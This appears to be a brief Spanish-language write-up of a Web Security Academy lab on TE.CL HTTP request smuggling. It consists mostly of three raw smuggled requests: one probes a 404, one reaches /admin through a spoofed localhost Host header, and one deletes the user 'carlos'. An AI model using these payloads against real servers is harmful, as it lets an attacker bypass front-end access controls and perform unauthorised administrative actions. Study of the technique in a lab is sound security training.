07 - Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Como hemos visto en otros labs : esto tira 404

POST / HTTP/1.1\r\n
Host: 0ac8003a04f0266b808d586300b700f8.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 4\r\n
\r\n
67\r\n
POST /notFound HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
foo=bar\r\n
0\r\n
\r\n

Usamos la misma técnica para bypassear los filtros :

POST / HTTP/1.1\r\n
Host: 0ac8003a04f0266b808d586300b700f8.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 4\r\n
\r\n
75\r\n
POST /admin HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Host: localhost\r\n
Content-Length: 15\r\n
\r\n
foo=bar\r\n
0\r\n
\r\n

El lab se resuelve así

POST / HTTP/1.1\r\n
Host: 0ac8003a04f0266b808d586300b700f8.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 4\r\n
\r\n
8c\r\n
POST /admin/delete?username=carlos HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Host: localhost\r\n
Content-Length: 15\r\n
\r\n
foo=bar\r\n
0\r\n
\r\n